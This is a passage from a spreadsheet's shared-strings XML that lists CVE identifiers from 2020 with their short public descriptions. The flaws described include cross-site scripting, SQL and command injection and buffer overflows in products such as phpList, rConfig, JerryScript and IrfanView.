  </si>
  <si>
    <t>An unrestricted file upload vulnerability was discovered in the Microweber 1.1.18 admin account page. An attacker can upload PHP code or any extension (eg- .exe) to the web server by providing image data and the image/jpeg content type with a .php extension.</t>
  </si>
  <si>
    <t>CVE-2020-23139</t>
  </si>
  <si>
    <t>Microweber 1.1.18 is affected by broken authentication and session management. Local session hijacking may occur, which could result in unauthorized access to system data or functionality, or a complete system compromise.</t>
  </si>
  <si>
    <t>CVE-2020-2314</t>
  </si>
  <si>
    <t>Jenkins AppSpider Plugin 1.0.12 and earlier stores a password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-23140</t>
  </si>
  <si>
    <t>Microweber 1.1.18 is affected by insufficient session expiration. When changing passwords, both sessions for when a user changes email and old sessions in any other browser or device, the session does not expire and remains active.</t>
  </si>
  <si>
    <t>CVE-2020-23148</t>
  </si>
  <si>
    <t>The userLogin parameter in ldap/login.php of rConfig 3.9.5 is unsanitized, allowing attackers to perform a LDAP injection and obtain sensitive information via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2020-23149</t>
  </si>
  <si>
    <t>The dbName parameter in ajaxDbInstall.php of rConfig 3.9.5 is unsanitized, allowing attackers to perform a SQL injection and access sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-2315</t>
  </si>
  <si>
    <t>Jenkins Visualworks Store Plugin 1.1.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-23150</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in config.inc.php of rConfig 3.9.5 allows attackers to access sensitive database information via a crafted GET request to install/lib/ajaxHandlers/ajaxDbInstall.php.</t>
  </si>
  <si>
    <t>CVE-2020-23151</t>
  </si>
  <si>
    <t>rConfig 3.9.5 allows command injection by sending a crafted GET request to lib/ajaxHandlers/ajaxArchiveFiles.php since the path parameter is passed directly to the exec function without being escaped.</t>
  </si>
  <si>
    <t>CVE-2020-2316</t>
  </si>
  <si>
    <t>Jenkins Static Analysis Utilities Plugin 1.96 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-23160</t>
  </si>
  <si>
    <t>Remote code execution in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to arbitrary commands as root on the devices.</t>
  </si>
  <si>
    <t>CVE-2020-23161</t>
  </si>
  <si>
    <t>Local file inclusion in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to traverse directories and read sensitive files via the Maintenance &gt; Logs menu and manipulating the file-path in the URL.</t>
  </si>
  <si>
    <t>CVE-2020-23162</t>
  </si>
  <si>
    <t>Sensitive information disclosure and weak encryption in Pyrescom Termod4 time management devices before 10.04k allows remote attackers to read a session-file and obtain plain-text user credentials.</t>
  </si>
  <si>
    <t>CVE-2020-2317</t>
  </si>
  <si>
    <t>Jenkins FindBugs Plugin 5.0.0 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to Jenkins FindBugs Plugin's post build step.</t>
  </si>
  <si>
    <t>CVE-2020-23171</t>
  </si>
  <si>
    <t>A vulnerability in all versions of Nim-lang allows unauthenticated attackers to write files to arbitrary directories via a crafted zip file with dot-slash characters included in the name of the crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-23172</t>
  </si>
  <si>
    <t>A vulnerability in all versions of Kuba allows attackers to overwrite arbitrary files in arbitrary directories with crafted Zip files due to improper validation of file paths in .zip archives.</t>
  </si>
  <si>
    <t>CVE-2020-23178</t>
  </si>
  <si>
    <t>An issue exists in PHP-Fusion 9.03.50 where session cookies are not deleted once a user logs out, allowing for an attacker to perform a session replay attack and impersonate the victim user.</t>
  </si>
  <si>
    <t>CVE-2020-23179</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in administration/settings_main.php of PHP-Fusion 9.03.50 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Site footer" field.</t>
  </si>
  <si>
    <t>CVE-2020-2318</t>
  </si>
  <si>
    <t>Jenkins Mail Commander Plugin for Jenkins-ci Plugin 1.0.0 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-23181</t>
  </si>
  <si>
    <t>A reflected cross site scripting (XSS) vulnerability in /administration/theme.php of PHP-Fusion 9.03.60 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Manage Theme" field.</t>
  </si>
  <si>
    <t>CVE-2020-23182</t>
  </si>
  <si>
    <t>The component /php-fusion/infusions/shoutbox_panel/shoutbox_archive.php in PHP-Fusion 9.03.60 allows attackers to redirect victim users to malicious websites via a crafted payload entered into the Shoutbox message panel.</t>
  </si>
  <si>
    <t>CVE-2020-23184</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in /administration/settings_registration.php of PHP-Fusion 9.03.60 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Registration" field.</t>
  </si>
  <si>
    <t>CVE-2020-23185</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in /administration/setting_security.php of PHP-Fusion 9.03.60 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-2319</t>
  </si>
  <si>
    <t>Jenkins VMware Lab Manager Slaves Plugin 0.2.8 and earlier stores a password unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-23190</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the "Import emails" module in phplist 3.5.4 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-23192</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.4 and below allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload in the "admin" parameter under the "Manage administrators" module.</t>
  </si>
  <si>
    <t>CVE-2020-23194</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the "Import Subscribers" feature in phplist 3.5.4 and below allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-2320</t>
  </si>
  <si>
    <t>Jenkins Plugin Installation Manager Tool 2.1.3 and earlier does not verify plugin downloads.</t>
  </si>
  <si>
    <t>CVE-2020-23205</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in Monstra CMS version 3.0.4 allows attackers to execute arbitrary web scripts or HTML via crafted a payload entered into the "Site Name" field under the "Site Settings" module.</t>
  </si>
  <si>
    <t>CVE-2020-23207</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Edit Values" field under the "Configure Attributes" module.</t>
  </si>
  <si>
    <t>CVE-2020-23208</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Send test" field under the "Start or continue campaign" module.</t>
  </si>
  <si>
    <t>CVE-2020-23209</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "List Description" field under the "Edit A List" module.</t>
  </si>
  <si>
    <t>CVE-2020-2321</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Shelve Project Plugin 3.0 and earlier allows attackers to shelve, unshelve, or delete a project.</t>
  </si>
  <si>
    <t>CVE-2020-23214</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Configure categories" field under the "Categorise Lists" module.</t>
  </si>
  <si>
    <t>CVE-2020-23217</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in phplist 3.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the "Add a list" field under the "Import Emails" module.</t>
  </si>
  <si>
    <t>CVE-2020-23219</t>
  </si>
  <si>
    <t>Monstra CMS 3.0.4 allows attackers to execute arbitrary code via a crafted payload entered into the "Snippet content" field under the "Edit Snippet" module.</t>
  </si>
  <si>
    <t>CVE-2020-2322</t>
  </si>
  <si>
    <t>Jenkins Chaos Monkey Plugin 0.3 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to generate load and to generate memory leaks.</t>
  </si>
  <si>
    <t>CVE-2020-23226</t>
  </si>
  <si>
    <t>Multiple Cross Site Scripting (XSS) vulneratiblities exist in Cacti 1.2.12 in (1) reports_admin.php, (2) data_queries.php, (3) data_input.php, (4) graph_templates.php, (5) graphs.php, (6) reports_admin.php, and (7) data_input.php.</t>
  </si>
  <si>
    <t>CVE-2020-2323</t>
  </si>
  <si>
    <t>Jenkins Chaos Monkey Plugin 0.4 and earlier does not perform permission checks in an HTTP endpoint, allowing attackers with Overall/Read permission to access the Chaos Monkey page and to see the history of actions.</t>
  </si>
  <si>
    <t>CVE-2020-23234</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerabiity exists in LavaLite CMS 5.8.0 via the Menu Blocks feature, which can be bypassed by using HTML event handlers, such as "ontoggle,".</t>
  </si>
  <si>
    <t>CVE-2020-23238</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Evolution CMS 2.0.2 via the Document Manager feature.</t>
  </si>
  <si>
    <t>CVE-2020-23239</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Textpattern CMS 4.8.1 via Custom fields in the Menu Preferences feature.</t>
  </si>
  <si>
    <t>CVE-2020-2324</t>
  </si>
  <si>
    <t>Jenkins CVS Plugin 2.16 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-23240</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerablity in CMS Made Simple 2.2.14 via the Logic field in the Content Manager feature.</t>
  </si>
  <si>
    <t>CVE-2020-23241</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in CMS Made Simple 2.2.14 in "Extra" via 'News &gt; Article" feature.</t>
  </si>
  <si>
    <t>CVE-2020-23242</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in NavigateCMS 2.9 when performing a Create or Edit via the Tools feature.</t>
  </si>
  <si>
    <t>CVE-2020-23243</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in NavigateCMS NavigateCMS 2.9 via the name="wrong_path_redirect" feature.</t>
  </si>
  <si>
    <t>CVE-2020-23249</t>
  </si>
  <si>
    <t>GigaVUE-OS (GVOS) 5.4 - 5.9 stores a Redis database password in plaintext.</t>
  </si>
  <si>
    <t>CVE-2020-23250</t>
  </si>
  <si>
    <t>GigaVUE-OS (GVOS) 5.4 - 5.9 uses a weak algorithm for a hash stored in internal database.</t>
  </si>
  <si>
    <t>CVE-2020-23262</t>
  </si>
  <si>
    <t>An issue was discovered in ming-soft MCMS v5.0, where a malicious user can exploit SQL injection without logging in through /mcms/view.do.</t>
  </si>
  <si>
    <t>CVE-2020-23263</t>
  </si>
  <si>
    <t>Persistent Cross-site scripting vulnerability on Fork CMS version 5.8.2 allows remote attackers to inject arbitrary Javascript code via the "navigation_title" parameter and the "title" parameter in /private/en/pages/add.</t>
  </si>
  <si>
    <t>CVE-2020-23264</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) in Fork-CMS before 5.8.2 allow remote attackers to hijack the authentication of logged administrators.</t>
  </si>
  <si>
    <t>CVE-2020-23266</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The OD_ReadUTF8String function in odf_code.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted media file.</t>
  </si>
  <si>
    <t>CVE-2020-23267</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The gf_hinter_track_process function in isom_hinter_track_process.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted media file</t>
  </si>
  <si>
    <t>CVE-2020-23269</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The stbl_GetSampleSize function in isomedia/stbl_read.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted media file.</t>
  </si>
  <si>
    <t>CVE-2020-23273</t>
  </si>
  <si>
    <t>Heap-buffer overflow in the randomize_iparp function in edit_packet.c. of Tcpreplay v4.3.2 allows attackers to cause a denial of service (DOS) via a crafted pcap.</t>
  </si>
  <si>
    <t>CVE-2020-23282</t>
  </si>
  <si>
    <t>SQL injection in Logon Page in MV's mConnect application, v02.001.00, allows an attacker to use a non existing user with a generic password to connect to the application and get access to unauthorized information.</t>
  </si>
  <si>
    <t>CVE-2020-23283</t>
  </si>
  <si>
    <t>Information disclosure in Logon Page in MV's mConnect application v02.001.00 allows an attacker to know valid users from the application's database via brute force.</t>
  </si>
  <si>
    <t>CVE-2020-23284</t>
  </si>
  <si>
    <t>Information disclosure in aspx pages in MV's IDCE application v1.0 allows an attacker to copy and paste aspx pages in the end of the URL application that connect into the database which reveals internal and sensitive information without logging into the web application.</t>
  </si>
  <si>
    <t>CVE-2020-23302</t>
  </si>
  <si>
    <t>There is a heap-use-after-free at ecma-helpers-string.c:772 in ecma_ref_ecma_string in JerryScript 2.2.0</t>
  </si>
  <si>
    <t>CVE-2020-23303</t>
  </si>
  <si>
    <t>There is a heap-buffer-overflow at jmem-poolman.c:165 in jmem_pools_collect_empty in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23306</t>
  </si>
  <si>
    <t>There is a stack-overflow at ecma-regexp-object.c:535 in ecma_regexp_match in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23308</t>
  </si>
  <si>
    <t>There is an Assertion 'context_p-&gt;stack_top_uint8 == LEXER_EXPRESSION_START' at js-parser-expr.c:3565 in parser_parse_expression in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23309</t>
  </si>
  <si>
    <t>There is an Assertion 'context_p-&gt;stack_depth == context_p-&gt;context_stack_depth' failed at js-parser-statm.c:2756 in parser_parse_statements in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23310</t>
  </si>
  <si>
    <t>There is an Assertion 'context_p-&gt;next_scanner_info_p-&gt;type == SCANNER_TYPE_FUNCTION' failed at js-parser-statm.c:733 in parser_parse_function_statement in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23311</t>
  </si>
  <si>
    <t>There is an Assertion 'context_p-&gt;token.type == LEXER_RIGHT_BRACE || context_p-&gt;token.type == LEXER_ASSIGN || context_p-&gt;token.type == LEXER_COMMA' failed at js-parser-expr.c:3230 in parser_parse_object_initializer in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23312</t>
  </si>
  <si>
    <t>There is an Assertion 'context.status_flags &amp; PARSER_SCANNING_SUCCESSFUL' failed at js-parser.c:2185 in parser_parse_source in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23313</t>
  </si>
  <si>
    <t>There is an Assertion 'scope_stack_p &gt; context_p-&gt;scope_stack_p' failed at js-scanner-util.c:2510 in scanner_literal_is_created in JerryScript 2.2.0</t>
  </si>
  <si>
    <t>CVE-2020-23314</t>
  </si>
  <si>
    <t>There is an Assertion 'block_found' failed at js-parser-statm.c:2003 parser_parse_try_statement_end in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23315</t>
  </si>
  <si>
    <t>There is an ASSERTION (pFuncBody-&gt;GetYieldRegister() == oldYieldRegister) failed in Js::DebugContext::RundownSourcesAndReparse in ChakraCore version 1.12.0.0-beta.</t>
  </si>
  <si>
    <t>CVE-2020-23319</t>
  </si>
  <si>
    <t>There is an Assertion in '(flags &gt;&gt; CBC_STACK_ADJUST_SHIFT) &gt;= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags &gt;&gt; CBC_STACK_ADJUST_SHIFT)) &lt;= context_p-&gt;stack_depth' in parser_emit_cbc_backward_branch in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23320</t>
  </si>
  <si>
    <t>There is an Assertion in 'context_p-&gt;next_scanner_info_p-&gt;type == SCANNER_TYPE_FUNCTION' in parser_parse_function_arguments in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23321</t>
  </si>
  <si>
    <t>There is a heap-buffer-overflow at lit-strings.c:431 in lit_read_code_unit_from_utf8 in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23322</t>
  </si>
  <si>
    <t>There is an Assertion in 'context_p-&gt;token.type == LEXER_RIGHT_BRACE || context_p-&gt;token.type == LEXER_ASSIGN || context_p-&gt;token.type == LEXER_COMMA' in parser_parse_object_initializer in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23323</t>
  </si>
  <si>
    <t>There is a heap-buffer-overflow at re-parser.c in re_parse_char_escape in JerryScript 2.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-23330</t>
  </si>
  <si>
    <t>An issue was discovered in Bento4 version 06c39d9. A NULL pointer dereference exists in the AP4_Stz2Atom::GetSampleSize component located in /Core/Ap4Stz2Atom.cpp. It allows an attacker to cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-23331</t>
  </si>
  <si>
    <t>An issue was discovered in Bento4 version 06c39d9. A NULL pointer dereference exists in the AP4_DescriptorListWriter::Action component located in /Core/Ap4Descriptor.h. It allows an attacker to cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-23332</t>
  </si>
  <si>
    <t>A heap-based buffer overflow exists in the AP4_StdcFileByteStream::ReadPartial component located in /StdC/Ap4StdCFileByteStream.cpp of Bento4 version 06c39d9. This issue can lead to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-23333</t>
  </si>
  <si>
    <t>A heap-based buffer overflow exists in the AP4_CttsAtom::AP4_CttsAtom component located in /Core/Ap4Utils.h of Bento4 version 06c39d9. This can lead to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-23334</t>
  </si>
  <si>
    <t>A WRITE memory access in the AP4_NullTerminatedStringAtom::AP4_NullTerminatedStringAtom component of Bento4 version 06c39d9 can lead to a segmentation fault.</t>
  </si>
  <si>
    <t>CVE-2020-23341</t>
  </si>
  <si>
    <t>A reflected cross site scripting (XSS) vulnerability in the /header.tmpl.php component of ATutor 2.2.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-23342</t>
  </si>
  <si>
    <t>A CSRF vulnerability exists in Anchor CMS 0.12.7 anchor/views/users/edit.php that can change the Delete admin users.</t>
  </si>
  <si>
    <t>CVE-2020-23349</t>
  </si>
  <si>
    <t>An intent redirection issue was doscovered in Sina Weibo Android SDK 4.2.7 (com.sina.weibo.sdk.share.WbShareTransActivity), any unexported Activities could be started by the com.sina.weibo.sdk.share.WbShareTransActivity.</t>
  </si>
  <si>
    <t>CVE-2020-23352</t>
  </si>
  <si>
    <t>Z-BlogPHP 1.6.0 Valyria is affected by incorrect access control. PHP loose comparison and a magic hash can be used to bypass authentication. zb_user/plugin/passwordvisit/include.php:passwordvisit_input_password() uses loose comparison to authenticate, which can be bypassed via magic hash values.</t>
  </si>
  <si>
    <t>CVE-2020-23355</t>
  </si>
  <si>
    <t>** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Codiad 2.8.4 /componetns/user/class.user.php:Authenticate() is vulnerable in magic hash authentication bypass. If encrypted or hash value for the passwords form certain formats of magic hash, e.g, 0e123, another hash value 0e234 something can successfully authenticate.</t>
  </si>
  <si>
    <t>CVE-2020-23356</t>
  </si>
  <si>
    <t>dmin/kernel/api/login.class.phpin in nibbleblog v3.7.1c allows type juggling for login bypass because == is used instead of === for password hashes, which mishandles hashes that begin with 0e followed by exclusively numerical characters.</t>
  </si>
  <si>
    <t>CVE-2020-23359</t>
  </si>
  <si>
    <t>WeBid 1.2.2 admin/newuser.php has an issue with password rechecking during registration because it uses a loose comparison to check the identicalness of two passwords. Two non-identical passwords can still bypass the check.</t>
  </si>
  <si>
    <t>CVE-2020-23360</t>
  </si>
  <si>
    <t>oscommerce v2.3.4.1 has a functional problem in user registration and password rechecking, where a non-identical password can bypass the checks in /catalog/admin/administrators.php and /catalog/password_reset.php</t>
  </si>
  <si>
    <t>CVE-2020-23361</t>
  </si>
  <si>
    <t>phpList 3.5.3 allows type juggling for login bypass because == is used instead of === for password hashes, which mishandles hashes that begin with 0e followed by exclusively numerical characters.</t>
  </si>
  <si>
    <t>CVE-2020-23369</t>
  </si>
  <si>
    <t>In YzmCMS 5.6, XSS was discovered in member/member_content/init.html via the SRC attribute of an IFRAME element because of using UEditor 1.4.3.3.</t>
  </si>
  <si>
    <t>CVE-2020-23370</t>
  </si>
  <si>
    <t>In YzmCMS 5.6, stored XSS exists via the common/static/plugin/ueditor/1.4.3.3/php/controller.php action parameter, which allows remote attackers to upload a swf file. The swf file can be injected with arbitrary web script or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-23371</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in static/admin/js/kindeditor/plugins/multiimage/images/swfupload.swf in noneCms v1.3.0 allows remote attackers to inject arbitrary web script or HTML via the movieName parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23373</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in admin/nav/add.html in noneCMS v1.3.0 allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23374</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in admin/article/add.html in noneCMS v1.3.0 allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23376</t>
  </si>
  <si>
    <t>NoneCMS v1.3 has a CSRF vulnerability in public/index.php/admin/nav/add.html, as demonstrated by adding a navigation column which can be injected with arbitrary web script or HTML via the name parameter to launch a stored XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-23426</t>
  </si>
  <si>
    <t>zzcms 201910 contains an access control vulnerability through escalation of privileges in /user/adv.php, which allows an attacker to modify data for further attacks such as CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-23446</t>
  </si>
  <si>
    <t>Verint Workforce Optimization suite 15.1 (15.1.0.37634) has Unauthenticated Information Disclosure via API</t>
  </si>
  <si>
    <t>CVE-2020-23447</t>
  </si>
  <si>
    <t>newbee-mall 1.0 is affected by cross-site scripting in shop-cart/settle. Users only need to write xss payload in their address information when buying goods, which is triggered when viewing the "View Recipient Information" of this order in "Order Management Office".</t>
  </si>
  <si>
    <t>CVE-2020-23448</t>
  </si>
  <si>
    <t>newbee-mall all versions are affected by incorrect access control to remotely gain privileges through AdminLoginInterceptor.java. The authentication logic of the system's background /admin is in code AdminLoginInterceptor, which can be bypassed.</t>
  </si>
  <si>
    <t>CVE-2020-23449</t>
  </si>
  <si>
    <t>newbee-mall all versions are affected by incorrect access control to remotely gain privileges through NewBeeMallIndexConfigServiceImpl.java. Unauthorized changes can be made to any user information through the userID.</t>
  </si>
  <si>
    <t>CVE-2020-23450</t>
  </si>
  <si>
    <t>Spiceworks Version &lt;= 7.5.00107 is affected by XSS. Any name typed on Custom Groups function is vulnerable to stored XSS as they displayed on http://127.0.0.1/inventory/groups/ without output sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-23451</t>
  </si>
  <si>
    <t>Spiceworks Version &lt;= 7.5.00107 is affected by CSRF which can lead to privilege escalation via "/settings/v1/users" function.</t>
  </si>
  <si>
    <t>CVE-2020-23466</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in the phpgurukul Online Marriage Registration System 1.0 allows attackers to run arbitrary code via the wzipcode field.</t>
  </si>
  <si>
    <t>CVE-2020-23469</t>
  </si>
  <si>
    <t>gmate v0.12+bionic contains a regular expression denial of service (ReDoS) vulnerability in the gedit3 plugin.</t>
  </si>
  <si>
    <t>CVE-2020-23478</t>
  </si>
  <si>
    <t>Leo Editor v6.2.1 was discovered to contain a regular expression denial of service (ReDoS) vulnerability in the component plugins/importers/dart.py.</t>
  </si>
  <si>
    <t>CVE-2020-23481</t>
  </si>
  <si>
    <t>CMS Made Simple 2.2.14 was discovered to contain a cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Field Definition text field.</t>
  </si>
  <si>
    <t>CVE-2020-23489</t>
  </si>
  <si>
    <t>The import.json.php file before 8.9 for Avideo is vulnerable to a File Deletion vulnerability. This allows the deletion of configuration.php, which leads to certain privilege checks not being in place, and therefore a user can escalate privileges to admin.</t>
  </si>
  <si>
    <t>CVE-2020-23490</t>
  </si>
  <si>
    <t>There was a local file disclosure vulnerability in AVideo &lt; 8.9 via the proxy streaming. An unauthenticated attacker can exploit this issue to read an arbitrary file on the server. Which could leak database credentials or other sensitive information such as /etc/passwd file.</t>
  </si>
  <si>
    <t>CVE-2020-23512</t>
  </si>
  <si>
    <t>VR CAM P1 Model P1 v1 has an incorrect access control vulnerability where an attacker can obtain complete access of the device from web (remote) without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-23517</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.</t>
  </si>
  <si>
    <t>CVE-2020-23518</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in UltimateKode Neo Billing - Accounting, Invoicing And CRM Software up to version 3.5 which allows remote attackers to inject arbitrary web script or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-23520</t>
  </si>
  <si>
    <t>imcat 5.2 allows an authenticated file upload and consequently remote code execution via the picture functionality.</t>
  </si>
  <si>
    <t>CVE-2020-23522</t>
  </si>
  <si>
    <t>Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23533</t>
  </si>
  <si>
    <t>Union Pay up to 1.2.0, for web based versions contains a CWE-347: Improper Verification of Cryptographic Signature vulnerability, allows attackers to shop for free in merchants' websites and mobile apps, via a crafted authentication code (MAC) which is generated based on a secret key which is NULL.</t>
  </si>
  <si>
    <t>CVE-2020-23534</t>
  </si>
  <si>
    <t>A server-side request forgery (SSRF) vulnerability in Upgrade.php of gopeak masterlab 2.1.5, via the 'source' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23539</t>
  </si>
  <si>
    <t>An issue was discovered in Realtek rtl8723de BLE Stack &lt;= 4.1 that allows remote attackers to cause a Denial of Service via the interval field to the CONNECT_REQ message.</t>
  </si>
  <si>
    <t>CVE-2020-23545</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ReadXPM_W+0x0000000000000531.</t>
  </si>
  <si>
    <t>CVE-2020-23546</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows attackers to cause a denial of service or possibly other unspecified impacts via a crafted XBM file, related to a "Data from Faulting Address is used as one or more arguments in a subsequent Function Call starting at FORMATS!ReadMosaic+0x0000000000000981.</t>
  </si>
  <si>
    <t>CVE-2020-23549</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows attackers to cause a denial of service or possibly other unspecified impacts via a crafted .cr2 file, related to a "Data from Faulting Address controls Branch Selection starting at FORMATS!GetPlugInInfo+0x00000000000047f6".</t>
  </si>
  <si>
    <t>CVE-2020-23550</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e82.</t>
  </si>
  <si>
    <t>CVE-2020-23551</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e30.</t>
  </si>
  <si>
    <t>CVE-2020-23552</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e62.</t>
  </si>
  <si>
    <t>CVE-2020-23553</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007d33.</t>
  </si>
  <si>
    <t>CVE-2020-23554</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e20.</t>
  </si>
  <si>
    <t>CVE-2020-23555</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e6e.</t>
  </si>
  <si>
    <t>CVE-2020-23556</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!GetPlugInInfo+0x0000000000007e28.</t>
  </si>
  <si>
    <t>CVE-2020-23557</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x000000000000755d.</t>
  </si>
  <si>
    <t>CVE-2020-23558</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000007f4b.</t>
  </si>
  <si>
    <t>CVE-2020-23559</t>
  </si>
  <si>
